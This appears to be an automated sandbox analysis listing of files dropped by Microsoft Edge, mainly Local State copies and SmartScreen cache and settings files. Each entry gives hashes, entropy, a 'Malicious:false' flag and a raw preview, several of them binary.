                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF49aa6.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4faa8.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):47
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                        MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                        SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                        SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                        SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                        MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                        SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                        SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                        SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):81
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                        MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                        SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                        SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                        SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):130439
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                        MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                        SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                        SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                        SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                        MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                        SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                        SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                        SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):57
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                        MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                        SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                        SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                        SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                        MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                        SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                        SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                        SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):575056
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                        MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                        SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                        SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                        SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):460992
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                        MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                        SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                        SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                        SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):14
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.3787834934861767
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:ZK7q6:ZA
                                                                                                                                                                                                                                                                                                                        MD5:DF741B3F19D9DC2621EAF973C8C9FA9D
                                                                                                                                                                                                                                                                                                                        SHA1:F45F1D9791C05366A8A23322D497C89957E75E61
                                                                                                                                                                                                                                                                                                                        SHA-256:6E5DDBA6D7AA3B287EA364034E1F843E4146FF92C07D8426F4A7C4B0E6435006
                                                                                                                                                                                                                                                                                                                        SHA-512:650DE3F99038BFFBFEF41A9ACC0A06E15803550C6456D0BDEAC9EBE18AEA94AB3A0BB7D85B7A0230CE6F510F5E26FA739FE58924F355D7E3714EC37DAA4C70D2
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:downloadCache_

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache_

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):179
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.966120756827709
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YTyLSmafBoTfQsWwTbDozRLuLgfGBkGAeekVy8Hfjg9PIAclWAHXQRoY:YWLSGTQ9wTbDo9LuLgfGBPAzkVj/EMlS
                                                                                                                                                                                                                                                                                                                        MD5:37F0A65C97B14167187A7860C319B2E7
                                                                                                                                                                                                                                                                                                                        SHA1:EB8159027408291DD45F1D2F5F281FDDDD6C75C4
                                                                                                                                                                                                                                                                                                                        SHA-256:54AF542BEF58FEC1DB8E4447855BE5E689390F137EFAD0747E42887F00BFF067
                                                                                                                                                                                                                                                                                                                        SHA-512:AD0F71304F71B021DCD1E0C02607F803B939063D59583B9915A2F38A2A747BD978BCBA390D8D08DC1308A706D3DD03A8209DDC182AD54E4FCC72D0F27A21B2E6
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"version":1,"cache_data":[{"file_hash":"e0ec5b7ffe06f92c","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":0,"expiration_time":1733953235254146}]}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):9
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                        MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                        SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                        SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                        SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:uriCache_

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):179
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.955869148534714
                                                                                                                                                                                                                                                                                                                        Encrypted:false
